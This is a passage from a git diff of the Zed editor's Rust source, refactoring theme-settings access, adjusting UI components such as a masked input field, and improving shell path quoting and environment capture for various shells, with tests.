Size; + fn max_offset(&self) -> Point; fn set_offset(&self, point: Point); fn offset(&self) -> Point; fn viewport(&self) -> Bounds; @@ -984,7 +961,7 @@ pub trait ScrollableHandle: 'static + Any + Sized + Clone { self.max_offset().along(axis) > Pixels::ZERO } fn content_size(&self) -> Size { - self.viewport().size + self.max_offset() + self.viewport().size + self.max_offset().into() } } @@ -1006,7 +983,7 @@ impl ScrollbarLayout { fn compute_click_offset( &self, event_position: 
Point, - max_offset: Size, + max_offset: Point, event_type: ScrollbarMouseEvent, ) -> Pixels { let Self { @@ -1041,7 +1018,18 @@ impl ScrollbarLayout { impl PartialEq for ScrollbarLayout { fn eq(&self, other: &Self) -> bool { - self.axis == other.axis && self.thumb_bounds == other.thumb_bounds + if self.axis != other.axis { + return false; + } + + let axis = self.axis; + let thumb_offset = + self.thumb_bounds.origin.along(axis) - self.track_bounds.origin.along(axis); + let other_thumb_offset = + other.thumb_bounds.origin.along(axis) - other.track_bounds.origin.along(axis); + + thumb_offset == other_thumb_offset + && self.thumb_bounds.size.along(axis) == other.thumb_bounds.size.along(axis) } } diff --git a/crates/ui/src/components/toggle.rs b/crates/ui/src/components/toggle.rs index 86ff1d8eff8691a2610a4a7e2268aaf47502e306..0b1d7884687b5a3f95c1d54d6a357c4425326f58 100644 --- a/crates/ui/src/components/toggle.rs +++ b/crates/ui/src/components/toggle.rs @@ -2,7 +2,6 @@ use gpui::{ AnyElement, AnyView, ClickEvent, ElementId, Hsla, IntoElement, KeybindingKeystroke, Keystroke, Styled, Window, div, hsla, prelude::*, }; -use settings::KeybindSource; use std::{rc::Rc, sync::Arc}; use crate::utils::is_light; @@ -1051,7 +1050,7 @@ impl Component for Switch { Keystroke::parse("cmd-s").unwrap(), )] .into(), - KeybindSource::Base, + false, ))) .into_any_element(), )], diff --git a/crates/ui/src/components/tooltip.rs b/crates/ui/src/components/tooltip.rs index 8b4ff3f73163f38e19da80462e687db3d88efc6f..8124b4ecbafdc6b096e91892741fe774e3ba032f 100644 --- a/crates/ui/src/components/tooltip.rs +++ b/crates/ui/src/components/tooltip.rs @@ -1,12 +1,9 @@ use std::borrow::Borrow; use std::rc::Rc; -use gpui::{Action, AnyElement, AnyView, AppContext, FocusHandle, IntoElement, Render}; -use settings::Settings; -use theme::ThemeSettings; - use crate::prelude::*; use crate::{Color, KeyBinding, Label, LabelSize, StyledExt, h_flex, v_flex}; +use gpui::{Action, AnyElement, AnyView, AppContext, 
FocusHandle, IntoElement, Render}; #[derive(RegisterComponent)] pub struct Tooltip { @@ -221,7 +218,7 @@ where C: AppContext + Borrow, { let app = (*cx).borrow(); - let ui_font = ThemeSettings::get_global(app).ui_font.clone(); + let ui_font = theme::theme_settings(app).ui_font(app).clone(); // padding to avoid tooltip appearing right below the mouse cursor div().pl_2().pt_2p5().child( diff --git a/crates/ui/src/components/tree_view_item.rs b/crates/ui/src/components/tree_view_item.rs index c96800223d9328779a2e71194a31315e1d57c175..f6d90fceff5bf93cb2d3bd6bdda75c8593399f54 100644 --- a/crates/ui/src/components/tree_view_item.rs +++ b/crates/ui/src/components/tree_view_item.rs @@ -139,12 +139,17 @@ impl RenderOnce for TreeViewItem { let focused_border = cx.theme().colors().border_focused; let item_size = rems_from_px(28.); - let indentation_line = h_flex().size(item_size).flex_none().justify_center().child( - div() - .w_px() - .h_full() - .bg(cx.theme().colors().border.opacity(0.5)), - ); + let indentation_line = h_flex() + .h(item_size) + .w(px(22.)) + .flex_none() + .justify_center() + .child( + div() + .w_px() + .h_full() + .bg(cx.theme().colors().border.opacity(0.5)), + ); h_flex() .id(self.id) @@ -156,6 +161,9 @@ impl RenderOnce for TreeViewItem { .cursor_pointer() .size_full() .h(item_size) + .pl_0p5() + .pr_1() + .gap_2() .rounded_sm() .border_1() .border_color(transparent_border) @@ -168,30 +176,24 @@ impl RenderOnce for TreeViewItem { let label = self.label; if self.root_item { - this.px_1() - .gap_2p5() - .child( - Disclosure::new("toggle", self.expanded) - .when_some( - self.on_toggle.clone(), - |disclosure, on_toggle| { - disclosure.on_toggle_expanded(on_toggle) - }, - ) - .opened_icon(IconName::ChevronDown) - .closed_icon(IconName::ChevronRight), - ) - .child( - Label::new(label) - .when(!self.selected, |this| this.color(Color::Muted)), - ) + this.child( + Disclosure::new("toggle", self.expanded) + .when_some(self.on_toggle.clone(), |disclosure, 
on_toggle| { + disclosure.on_toggle_expanded(on_toggle) + }) + .opened_icon(IconName::ChevronDown) + .closed_icon(IconName::ChevronRight), + ) + .child( + Label::new(label) + .when(!self.selected, |this| this.color(Color::Muted)), + ) } else { this.child(indentation_line).child( h_flex() .id("nested_inner_tree_view_item") .w_full() .flex_grow() - .px_1() .child( Label::new(label) .when(!self.selected, |this| this.color(Color::Muted)), diff --git a/crates/ui/src/styles/spacing.rs b/crates/ui/src/styles/spacing.rs index c6629f5d8829b2ebd59a80a2a22c033ab8c389f6..50d5446ebc25826e6c0665e906141d77ba78d584 100644 --- a/crates/ui/src/styles/spacing.rs +++ b/crates/ui/src/styles/spacing.rs @@ -1,6 +1,5 @@ use gpui::{App, Pixels, Rems, px, rems}; -use settings::Settings; -use theme::{ThemeSettings, UiDensity}; +use theme::UiDensity; use ui_macros::derive_dynamic_spacing; // Derives [DynamicSpacing]. See [ui_macros::derive_dynamic_spacing]. @@ -51,5 +50,5 @@ derive_dynamic_spacing![ /// /// Always use [DynamicSpacing] for spacing values. pub fn ui_density(cx: &mut App) -> UiDensity { - ThemeSettings::get_global(cx).ui_density + theme::theme_settings(cx).ui_density(cx) } diff --git a/crates/ui/src/styles/typography.rs b/crates/ui/src/styles/typography.rs index 2bb0b35720be715251bc7c11a139a1fccfaf6035..69790d3d3dae6bbc8728a63af806357a276ed67a 100644 --- a/crates/ui/src/styles/typography.rs +++ b/crates/ui/src/styles/typography.rs @@ -3,8 +3,7 @@ use gpui::{ AnyElement, App, IntoElement, ParentElement, Rems, RenderOnce, SharedString, Styled, Window, div, rems, }; -use settings::Settings; -use theme::{ActiveTheme, ThemeSettings}; +use theme::ActiveTheme; use crate::{Color, rems_from_px}; @@ -12,16 +11,16 @@ use crate::{Color, rems_from_px}; pub trait StyledTypography: Styled + Sized { /// Sets the font family to the buffer font. 
fn font_buffer(self, cx: &App) -> Self { - let settings = ThemeSettings::get_global(cx); - let buffer_font_family = settings.buffer_font.family.clone(); + let settings = theme::theme_settings(cx); + let buffer_font_family = settings.buffer_font(cx).family.clone(); self.font_family(buffer_font_family) } /// Sets the font family to the UI font. fn font_ui(self, cx: &App) -> Self { - let settings = ThemeSettings::get_global(cx); - let ui_font_family = settings.ui_font.family.clone(); + let settings = theme::theme_settings(cx); + let ui_font_family = settings.ui_font(cx).family.clone(); self.font_family(ui_font_family) } @@ -82,7 +81,7 @@ pub trait StyledTypography: Styled + Sized { /// This should only be used for text that is displayed in a buffer, /// or other places that text needs to match the user's buffer font size. fn text_buffer(self, cx: &App) -> Self { - let settings = ThemeSettings::get_global(cx); + let settings = theme::theme_settings(cx); self.text_size(settings.buffer_font_size(cx)) } } @@ -133,28 +132,28 @@ pub enum TextSize { impl TextSize { /// Returns the text size in rems. 
pub fn rems(self, cx: &App) -> Rems { - let theme_settings = ThemeSettings::get_global(cx); + let settings = theme::theme_settings(cx); match self { Self::Large => rems_from_px(16.), Self::Default => rems_from_px(14.), Self::Small => rems_from_px(12.), Self::XSmall => rems_from_px(10.), - Self::Ui => rems_from_px(theme_settings.ui_font_size(cx)), - Self::Editor => rems_from_px(theme_settings.buffer_font_size(cx)), + Self::Ui => rems_from_px(settings.ui_font_size(cx)), + Self::Editor => rems_from_px(settings.buffer_font_size(cx)), } } pub fn pixels(self, cx: &App) -> Pixels { - let theme_settings = ThemeSettings::get_global(cx); + let settings = theme::theme_settings(cx); match self { Self::Large => px(16.), Self::Default => px(14.), Self::Small => px(12.), Self::XSmall => px(10.), - Self::Ui => theme_settings.ui_font_size(cx), - Self::Editor => theme_settings.buffer_font_size(cx), + Self::Ui => settings.ui_font_size(cx), + Self::Editor => settings.buffer_font_size(cx), } } } @@ -212,7 +211,7 @@ pub struct Headline { impl RenderOnce for Headline { fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { - let ui_font = ThemeSettings::get_global(cx).ui_font.clone(); + let ui_font = theme::theme_settings(cx).ui_font(cx).clone(); div() .font(ui_font) diff --git a/crates/ui/src/utils.rs b/crates/ui/src/utils.rs index b73915162f9e6be937af7323e95fb9d6a82d6c52..d88bf4a45e0b54536b6f5ca5ad4ae7c7fe936937 100644 --- a/crates/ui/src/utils.rs +++ b/crates/ui/src/utils.rs @@ -23,3 +23,36 @@ pub use with_rem_size::*; pub fn is_light(cx: &mut App) -> bool { cx.theme().appearance.is_light() } + +/// Returns the platform-appropriate label for the "reveal in file manager" action. 
+pub fn reveal_in_file_manager_label(is_remote: bool) -> &'static str { + if cfg!(target_os = "macos") && !is_remote { + "Reveal in Finder" + } else if cfg!(target_os = "windows") && !is_remote { + "Reveal in File Explorer" + } else { + "Reveal in File Manager" + } +} + +/// Capitalizes the first character of a string. +/// +/// This function takes a string slice as input and returns a new `String` with the first character +/// capitalized. +/// +/// # Examples +/// +/// ``` +/// use ui::utils::capitalize; +/// +/// assert_eq!(capitalize("hello"), "Hello"); +/// assert_eq!(capitalize("WORLD"), "WORLD"); +/// assert_eq!(capitalize(""), ""); +/// ``` +pub fn capitalize(str: &str) -> String { + let mut chars = str.chars(); + match chars.next() { + None => String::new(), + Some(first_char) => first_char.to_uppercase().collect::() + chars.as_str(), + } +} diff --git a/crates/ui_input/src/input_field.rs b/crates/ui_input/src/input_field.rs index 59a05497627838364b4037c44b236ab70c2b3c6b..16932b58e87cb9df83c14919b79bd048f33275fe 100644 --- a/crates/ui_input/src/input_field.rs +++ b/crates/ui_input/src/input_field.rs @@ -3,6 +3,7 @@ use component::{example_group, single_example}; use gpui::{App, FocusHandle, Focusable, Hsla, Length}; use std::sync::Arc; +use ui::Tooltip; use ui::prelude::*; use crate::ErasedEditor; @@ -38,6 +39,8 @@ pub struct InputField { tab_index: Option, /// Whether this field is a tab stop (can be focused via Tab key). tab_stop: bool, + /// Whether the field content is masked (for sensitive fields like passwords or API keys). + masked: Option, } impl Focusable for InputField { @@ -63,6 +66,7 @@ impl InputField { min_width: px(192.).into(), tab_index: None, tab_stop: true, + masked: None, } } @@ -96,6 +100,12 @@ impl InputField { self } + /// Sets this field as a masked/sensitive input (e.g., for passwords or API keys). 
+ pub fn masked(mut self, masked: bool) -> Self { + self.masked = Some(masked); + self + } + pub fn is_empty(&self, cx: &App) -> bool { self.editor().text(cx).trim().is_empty() } @@ -115,12 +125,20 @@ impl InputField { pub fn set_text(&self, text: &str, window: &mut Window, cx: &mut App) { self.editor().set_text(text, window, cx) } + + pub fn set_masked(&self, masked: bool, window: &mut Window, cx: &mut App) { + self.editor().set_masked(masked, window, cx) + } } impl Render for InputField { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { let editor = self.editor.clone(); + if let Some(masked) = self.masked { + self.editor.set_masked(masked, window, cx); + } + let theme_color = cx.theme().colors(); let style = InputFieldStyle { @@ -172,7 +190,31 @@ impl Render for InputField { this.gap_1() .child(Icon::new(icon).size(IconSize::Small).color(Color::Muted)) }) - .child(self.editor.render(window, cx)), + .child(self.editor.render(window, cx)) + .when_some(self.masked, |this, is_masked| { + this.child( + IconButton::new( + "toggle-masked", + if is_masked { + IconName::Eye + } else { + IconName::EyeOff + }, + ) + .icon_size(IconSize::Small) + .icon_color(Color::Muted) + .tooltip(Tooltip::text(if is_masked { "Show" } else { "Hide" })) + .on_click(cx.listener( + |this, _, window, cx| { + if let Some(ref mut masked) = this.masked { + *masked = !*masked; + this.editor.set_masked(*masked, window, cx); + cx.notify(); + } + }, + )), + ) + }), ) } } diff --git a/crates/ui_macros/src/dynamic_spacing.rs b/crates/ui_macros/src/dynamic_spacing.rs index 15ba3e241ec43d02b83e4143eb620505a0a2f02e..f1207f5487a89f0afbd23e620da4c4cf4172be9a 100644 --- a/crates/ui_macros/src/dynamic_spacing.rs +++ b/crates/ui_macros/src/dynamic_spacing.rs @@ -65,7 +65,7 @@ pub fn derive_spacing(input: TokenStream) -> TokenStream { DynamicSpacingValue::Single(n) => { let n = n.base10_parse::().unwrap(); quote! 
{ - DynamicSpacing::#variant => match ThemeSettings::get_global(cx).ui_density { + DynamicSpacing::#variant => match ::theme::theme_settings(cx).ui_density(cx) { ::theme::UiDensity::Compact => (#n - 4.0).max(0.0) / BASE_REM_SIZE_IN_PX, ::theme::UiDensity::Default => #n / BASE_REM_SIZE_IN_PX, ::theme::UiDensity::Comfortable => (#n + 4.0) / BASE_REM_SIZE_IN_PX, @@ -77,7 +77,7 @@ pub fn derive_spacing(input: TokenStream) -> TokenStream { let b = b.base10_parse::().unwrap(); let c = c.base10_parse::().unwrap(); quote! { - DynamicSpacing::#variant => match ThemeSettings::get_global(cx).ui_density { + DynamicSpacing::#variant => match ::theme::theme_settings(cx).ui_density(cx) { ::theme::UiDensity::Compact => #a / BASE_REM_SIZE_IN_PX, ::theme::UiDensity::Default => #b / BASE_REM_SIZE_IN_PX, ::theme::UiDensity::Comfortable => #c / BASE_REM_SIZE_IN_PX, @@ -157,7 +157,7 @@ pub fn derive_spacing(input: TokenStream) -> TokenStream { /// Returns the spacing value in pixels. pub fn px(&self, cx: &App) -> Pixels { - let ui_font_size_f32: f32 = ThemeSettings::get_global(cx).ui_font_size(cx).into(); + let ui_font_size_f32: f32 = ::theme::theme_settings(cx).ui_font_size(cx).into(); px(ui_font_size_f32 * self.spacing_ratio(cx)) } } diff --git a/crates/ui_prompt/Cargo.toml b/crates/ui_prompt/Cargo.toml index 55a98288433a7b31507310e20c4209a9d419e45f..9bcce107f3f7d6bd95ebddf6d33c4a9a29ec4493 100644 --- a/crates/ui_prompt/Cargo.toml +++ b/crates/ui_prompt/Cargo.toml @@ -19,6 +19,6 @@ gpui.workspace = true markdown.workspace = true menu.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true workspace.workspace = true diff --git a/crates/ui_prompt/src/ui_prompt.rs b/crates/ui_prompt/src/ui_prompt.rs index 3b2716fd92ea7889668767d66e47e5c43792f39e..92b1c9e74dcd2f7e227f5c325ea5defb0d9c8ed3 100644 --- a/crates/ui_prompt/src/ui_prompt.rs +++ b/crates/ui_prompt/src/ui_prompt.rs @@ -5,7 +5,7 @@ use gpui::{ }; use 
markdown::{Markdown, MarkdownElement, MarkdownStyle}; use settings::{Settings, SettingsStore}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{FluentBuilder, TintColor, prelude::*}; use workspace::WorkspaceSettings; diff --git a/crates/util/Cargo.toml b/crates/util/Cargo.toml index 6a9b30d463af2d9407e8f4c9e3a81133a87c1bce..4f317e79e0cfc92087250182531ae33a591b1f48 100644 --- a/crates/util/Cargo.toml +++ b/crates/util/Cargo.toml @@ -21,7 +21,7 @@ test-support = ["git2", "rand", "util_macros"] anyhow.workspace = true async_zip.workspace = true collections.workspace = true -dunce = "1.0" +dunce.workspace = true futures-lite.workspace = true futures.workspace = true globset.workspace = true @@ -64,7 +64,6 @@ tendril = "0.4.3" [dev-dependencies] git2.workspace = true -indoc.workspace = true rand.workspace = true util_macros.workspace = true pretty_assertions.workspace = true diff --git a/crates/util/src/command.rs b/crates/util/src/command.rs index 44db592640bc70362b924ffca674fd02a4126f3a..a131d3c15b9fed351cc1d3a86bad7771b7d53167 100644 --- a/crates/util/src/command.rs +++ b/crates/util/src/command.rs @@ -68,6 +68,10 @@ impl Command { self } + pub fn get_args(&self) -> impl Iterator { + self.0.get_args() + } + pub fn env(&mut self, key: impl AsRef, val: impl AsRef) -> &mut Self { self.0.env(key, val); self @@ -129,4 +133,8 @@ impl Command { pub async fn status(&mut self) -> std::io::Result { self.0.status().await } + + pub fn get_program(&self) -> &OsStr { + self.0.get_program() + } } diff --git a/crates/util/src/command/darwin.rs b/crates/util/src/command/darwin.rs index 347fc8180ed9325d4f36a3fcce2f3c68964321d5..a3d7561f4e3cfde1f6ff33cdc469af071044fa0b 100644 --- a/crates/util/src/command/darwin.rs +++ b/crates/util/src/command/darwin.rs @@ -104,6 +104,10 @@ impl Command { self } + pub fn get_args(&self) -> impl Iterator { + self.args.iter().map(|s| s.as_os_str()) + } + pub fn env(&mut self, key: impl AsRef, val: impl AsRef) -> &mut Self { 
self.envs .insert(key.as_ref().to_owned(), Some(val.as_ref().to_owned())); @@ -217,6 +221,10 @@ impl Command { let mut child = self.spawn()?; child.status().await } + + pub fn get_program(&self) -> &OsStr { + self.program.as_os_str() + } } #[derive(Debug)] diff --git a/crates/util/src/path_list.rs b/crates/util/src/path_list.rs index 1f923769780de2ae7f1dc18d3334020960ff3bb6..af99f4c6570b35b004179afb87b737d3a4356489 100644 --- a/crates/util/src/path_list.rs +++ b/crates/util/src/path_list.rs @@ -1,19 +1,20 @@ use std::{ + hash::{Hash, Hasher}, path::{Path, PathBuf}, sync::Arc, }; use crate::paths::SanitizedPath; use itertools::Itertools; -use serde::{Deserialize, Deserializer, Serialize, Serializer}; +use serde::{Deserialize, Serialize}; -/// A list of absolute paths, in a specific order. +/// A list of absolute paths, with an associated display order. /// -/// The paths are stored in lexicographic order, so that they can be compared to -/// other path lists without regard to the order of the paths. +/// Two `PathList` values are considered equal if they contain the same paths, +/// regardless of the order in which those paths were originally provided. /// /// The paths can be retrieved in the original order using `ordered_paths()`. -#[derive(Default, PartialEq, Eq, Debug, Clone)] +#[derive(Default, Debug, Clone)] pub struct PathList { /// The paths, in lexicographic order. paths: Arc<[PathBuf]>, @@ -23,7 +24,21 @@ pub struct PathList { order: Arc<[usize]>, } -#[derive(Debug)] +impl PartialEq for PathList { + fn eq(&self, other: &Self) -> bool { + self.paths == other.paths + } +} + +impl Eq for PathList {} + +impl Hash for PathList { + fn hash(&self, state: &mut H) { + self.paths.hash(state); + } +} + +#[derive(Debug, Clone, Serialize, Deserialize)] pub struct SerializedPathList { pub paths: String, pub order: String, @@ -50,11 +65,26 @@ impl PathList { self.paths.is_empty() } + /// Returns a new `PathList` with the given path removed. 
+ pub fn without_path(&self, path_to_remove: &Path) -> PathList { + let paths: Vec = self + .ordered_paths() + .filter(|p| p.as_path() != path_to_remove) + .cloned() + .collect(); + PathList::new(&paths) + } + /// Get the paths in lexicographic order. pub fn paths(&self) -> &[PathBuf] { self.paths.as_ref() } + /// Get the paths in the lexicographic order. + pub fn paths_owned(&self) -> Arc<[PathBuf]> { + self.paths.clone() + } + /// Get the order in which the paths were provided. pub fn order(&self) -> &[usize] { self.order.as_ref() @@ -119,19 +149,6 @@ impl PathList { } } -impl Serialize for PathList { - fn serialize(&self, serializer: S) -> Result { - self.paths.serialize(serializer) - } -} - -impl<'de> Deserialize<'de> for PathList { - fn deserialize>(deserializer: D) -> Result { - let paths: Vec = Vec::deserialize(deserializer)?; - Ok(PathList::new(&paths)) - } -} - #[cfg(test)] mod tests { use super::*; @@ -145,6 +162,12 @@ mod tests { assert_eq!(list1.order(), &[1, 0], "list1 order incorrect"); assert_eq!(list2.order(), &[0, 1], "list2 order incorrect"); + // Same paths in different order are equal (order is display-only). 
+ assert_eq!( + list1, list2, + "same paths with different order should be equal" + ); + let list1_deserialized = PathList::deserialize(&list1.serialize()); assert_eq!(list1_deserialized, list1, "list1 deserialization failed"); diff --git a/crates/util/src/paths.rs b/crates/util/src/paths.rs index 39b4064a1bd9d3c4c240abf9665b17151066e9ef..3ff07c67a8d2def75e4e7f756c4a466ea2b68ed0 100644 --- a/crates/util/src/paths.rs +++ b/crates/util/src/paths.rs @@ -601,6 +601,7 @@ const ROW_COL_CAPTURE_REGEX: &str = r"(?xs) | \((\d+)\)() # filename(row) ) + \:*$ | (.+?)(?: \:+(\d+)\:(\d+)\:*$ # filename:row:column @@ -2097,6 +2098,15 @@ mod tests { column: Some(9), } ); + + assert_eq!( + PathWithPosition::parse_str("main (1).log"), + PathWithPosition { + path: PathBuf::from("main (1).log"), + row: None, + column: None + } + ); } #[perf] @@ -2175,6 +2185,15 @@ mod tests { column: None } ); + + assert_eq!( + PathWithPosition::parse_str("C:\\Users\\someone\\main (1).log"), + PathWithPosition { + path: PathBuf::from("C:\\Users\\someone\\main (1).log"), + row: None, + column: None + } + ); } #[perf] diff --git a/crates/util/src/shell.rs b/crates/util/src/shell.rs index 27ab18b58ce14cc59d57e563103fc9135f93d060..87872856d916ae39809debaeb6c151705367246b 100644 --- a/crates/util/src/shell.rs +++ b/crates/util/src/shell.rs @@ -1012,4 +1012,40 @@ mod tests { "uname".to_string() ); } + + #[test] + fn test_try_quote_single_quote_paths() { + let path_with_quote = r"C:\Temp\O'Brien\repo"; + let shlex_shells = [ + ShellKind::Posix, + ShellKind::Fish, + ShellKind::Csh, + ShellKind::Tcsh, + ShellKind::Rc, + ShellKind::Xonsh, + ShellKind::Elvish, + ShellKind::Nushell, + ]; + + for shell_kind in shlex_shells { + let quoted = shell_kind.try_quote(path_with_quote).unwrap().into_owned(); + assert_ne!(quoted, path_with_quote); + assert_eq!( + shlex::split("ed), + Some(vec![path_with_quote.to_string()]) + ); + + if shell_kind == ShellKind::Nushell { + let prefixed = 
shell_kind.prepend_command_prefix("ed); + assert!(prefixed.starts_with('^')); + } + } + + for shell_kind in [ShellKind::PowerShell, ShellKind::Pwsh] { + let quoted = shell_kind.try_quote(path_with_quote).unwrap().into_owned(); + assert!(quoted.starts_with('\'')); + assert!(quoted.ends_with('\'')); + assert!(quoted.contains("O''Brien")); + } + } } diff --git a/crates/util/src/shell_env.rs b/crates/util/src/shell_env.rs index 4fc9fd2d69b608c1215495d84c340f11e5be8179..72c563abe52336c2b5ccc511746834a9a0384aeb 100644 --- a/crates/util/src/shell_env.rs +++ b/crates/util/src/shell_env.rs @@ -2,9 +2,21 @@ use std::path::Path; use anyhow::{Context as _, Result}; use collections::HashMap; +use serde::Deserialize; use crate::shell::ShellKind; +fn parse_env_map_from_noisy_output(output: &str) -> Result> { + for (position, _) in output.match_indices('{') { + let candidate = &output[position..]; + let mut deserializer = serde_json::Deserializer::from_str(candidate); + if let Ok(env_map) = HashMap::::deserialize(&mut deserializer) { + return Ok(env_map); + } + } + anyhow::bail!("Failed to find JSON in shell output: {output}") +} + pub fn print_env() { let env_vars: HashMap = std::env::vars().collect(); let json = serde_json::to_string_pretty(&env_vars).unwrap_or_else(|err| { @@ -73,13 +85,27 @@ async fn capture_unix( command.arg("-l"); } } + + match shell_kind { + // Nushell does not allow non-interactive login shells. 
+ // Instead of doing "-l -i -c ''" + // use "-l -e '; exit'" instead + ShellKind::Nushell => command.arg("-e"), + _ => command.args(["-i", "-c"]), + }; + // cd into the directory, triggering directory specific side-effects (asdf, direnv, etc) command_string.push_str(&format!("cd '{}';", directory.display())); if let Some(prefix) = shell_kind.command_prefix() { command_string.push(prefix); } command_string.push_str(&format!("{} --printenv {}", zed_path, redir)); - command.args(["-i", "-c", &command_string]); + + if let ShellKind::Nushell = shell_kind { + command_string.push_str("; exit"); + } + + command.arg(&command_string); super::set_pre_exec_to_start_new_session(&mut command); @@ -95,10 +121,9 @@ async fn capture_unix( ); // Parse the JSON output from zed --printenv - let env_map: collections::HashMap = serde_json::from_str(&env_output) - .with_context(|| { - format!("Failed to deserialize environment variables from json: {env_output}") - })?; + let env_map = parse_env_map_from_noisy_output(&env_output).with_context(|| { + format!("Failed to deserialize environment variables from json: {env_output}") + })?; Ok(env_map) } @@ -141,6 +166,14 @@ async fn capture_windows( std::env::current_exe().context("Failed to determine current zed executable path.")?; let shell_kind = ShellKind::new(shell_path, true); + let directory_string = directory.display().to_string(); + let zed_path_string = zed_path.display().to_string(); + let quote_for_shell = |value: &str| { + shell_kind + .try_quote(value) + .map(|quoted| quoted.into_owned()) + .unwrap_or_else(|| value.to_owned()) + }; let mut cmd = crate::command::new_command(shell_path); cmd.args(args); let cmd = match shell_kind { @@ -149,54 +182,52 @@ async fn capture_windows( | ShellKind::Rc | ShellKind::Fish | ShellKind::Xonsh - | ShellKind::Posix => cmd.args([ - "-l", - "-i", - "-c", - &format!( - "cd '{}'; '{}' --printenv", - directory.display(), - zed_path.display() - ), - ]), - ShellKind::PowerShell | ShellKind::Pwsh => 
cmd.args([ - "-NonInteractive", - "-NoProfile", - "-Command", - &format!( - "Set-Location '{}'; & '{}' --printenv", - directory.display(), - zed_path.display() - ), - ]), - ShellKind::Elvish => cmd.args([ - "-c", - &format!( - "cd '{}'; '{}' --printenv", - directory.display(), - zed_path.display() - ), - ]), - ShellKind::Nushell => cmd.args([ - "-c", - &format!( - "cd '{}'; {}'{}' --printenv", - directory.display(), - shell_kind - .command_prefix() - .map(|prefix| prefix.to_string()) - .unwrap_or_default(), - zed_path.display() - ), - ]), - ShellKind::Cmd => cmd.args([ - "/c", - "cd", - &directory.display().to_string(), - "&&", - &zed_path.display().to_string(), - "--printenv", - ]), + | ShellKind::Posix => { + let quoted_directory = quote_for_shell(&directory_string); + let quoted_zed_path = quote_for_shell(&zed_path_string); + cmd.args([ + "-l", + "-i", + "-c", + &format!("cd {}; {} --printenv", quoted_directory, quoted_zed_path), + ]) + } + ShellKind::PowerShell | ShellKind::Pwsh => { + let quoted_directory = ShellKind::quote_pwsh(&directory_string); + let quoted_zed_path = ShellKind::quote_pwsh(&zed_path_string); + cmd.args([ + "-NonInteractive", + "-NoProfile", + "-Command", + &format!( + "Set-Location {}; & {} --printenv", + quoted_directory, quoted_zed_path + ), + ]) + } + ShellKind::Elvish => { + let quoted_directory = quote_for_shell(&directory_string); + let quoted_zed_path = quote_for_shell(&zed_path_string); + cmd.args([ + "-c", + &format!("cd {}; {} --printenv", quoted_directory, quoted_zed_path), + ]) + } + ShellKind::Nushell => { + let quoted_directory = quote_for_shell(&directory_string); + let quoted_zed_path = quote_for_shell(&zed_path_string); + let zed_command = shell_kind + .prepend_command_prefix("ed_zed_path) + .into_owned(); + cmd.args([ + "-c", + &format!("cd {}; {} --printenv", quoted_directory, zed_command), + ]) + } + ShellKind::Cmd => { + let dir = directory_string.trim_end_matches('\\'); + cmd.args(["/d", "/c", "cd", dir, "&&", 
&zed_path_string, "--printenv"]) + } } .stdin(Stdio::null()) .stdout(Stdio::piped()) @@ -214,8 +245,7 @@ async fn capture_windows( ); let env_output = String::from_utf8_lossy(&output.stdout); - // Parse the JSON output from zed --printenv - serde_json::from_str(&env_output).with_context(|| { + parse_env_map_from_noisy_output(&env_output).with_context(|| { format!("Failed to deserialize environment variables from json: {env_output}") }) } diff --git a/crates/util/src/util.rs b/crates/util/src/util.rs index 4f129ef6d529aff0991b86882e5e60b6ad837d5c..bd8ab4e2d4d99864c5e0dc228410904f3338d7c6 100644 --- a/crates/util/src/util.rs +++ b/crates/util/src/util.rs @@ -686,28 +686,6 @@ impl PartialOrd for NumericPrefixWithSuffix<'_> { } } -/// Capitalizes the first character of a string. -/// -/// This function takes a string slice as input and returns a new `String` with the first character -/// capitalized. -/// -/// # Examples -/// -/// ``` -/// use util::capitalize; -/// -/// assert_eq!(capitalize("hello"), "Hello"); -/// assert_eq!(capitalize("WORLD"), "WORLD"); -/// assert_eq!(capitalize(""), ""); -/// ``` -pub fn capitalize(str: &str) -> String { - let mut chars = str.chars(); - match chars.next() { - None => String::new(), - Some(first_char) => first_char.to_uppercase().collect::() + chars.as_str(), - } -} - fn emoji_regex() -> &'static Regex { static EMOJI_REGEX: LazyLock = LazyLock::new(|| Regex::new("(\\p{Emoji}|\u{200D})").unwrap()); diff --git a/crates/vim/Cargo.toml b/crates/vim/Cargo.toml index 38bf9fed621aa3aa378cbcaa3479f7ecd7b60e11..64282953a33312b85cc1e7cf21076b0cb61dccab 100644 --- a/crates/vim/Cargo.toml +++ b/crates/vim/Cargo.toml @@ -44,6 +44,7 @@ settings.workspace = true task.workspace = true text.workspace = true theme.workspace = true +theme_settings.workspace = true menu.workspace = true tokio = { version = "1.15", features = ["full"], optional = true } ui.workspace = true @@ -54,11 +55,9 @@ workspace.workspace = true zed_actions.workspace = true 
[dev-dependencies] -assets.workspace = true command_palette = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } git_ui = { workspace = true, features = ["test-support"] } -title_bar = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } indoc.workspace = true language = { workspace = true, features = ["test-support"] } diff --git a/crates/vim/src/command.rs b/crates/vim/src/command.rs index 0eebcd9532a82fd999519c6c33a1c8df3bb16667..fd19a5dc400a24b9f27617c44bd71fe38073c757 100644 --- a/crates/vim/src/command.rs +++ b/crates/vim/src/command.rs @@ -28,7 +28,7 @@ use std::{ sync::OnceLock, time::Instant, }; -use task::{HideStrategy, RevealStrategy, SpawnInTerminal, TaskId}; +use task::{HideStrategy, RevealStrategy, SaveStrategy, SpawnInTerminal, TaskId}; use ui::ActiveTheme; use util::{ ResultExt, @@ -47,6 +47,7 @@ use crate::{ search::{FindCommand, ReplaceCommand, Replacement}, }, object::Object, + rewrap::Rewrap, state::{Mark, Mode}, visual::VisualDeleteLine, }; @@ -1347,7 +1348,7 @@ impl Position { let snapshot = editor.snapshot(window, cx); let target = match self { Position::Line { row, offset } => { - if let Some(anchor) = editor.active_excerpt(cx).and_then(|(_, buffer, _)| { + if let Some(anchor) = editor.active_buffer(cx).and_then(|buffer| { editor.buffer().read(cx).buffer_point_to_anchor( &buffer, Point::new(row.saturating_sub(1), 0), @@ -1659,9 +1660,13 @@ fn generate_commands(_: &App) -> Vec { action.range.replace(range.clone()); Some(Box::new(action)) }), - VimCommand::new(("bn", "ext"), workspace::ActivateNextItem).count(), - VimCommand::new(("bN", "ext"), workspace::ActivatePreviousItem).count(), - VimCommand::new(("bp", "revious"), 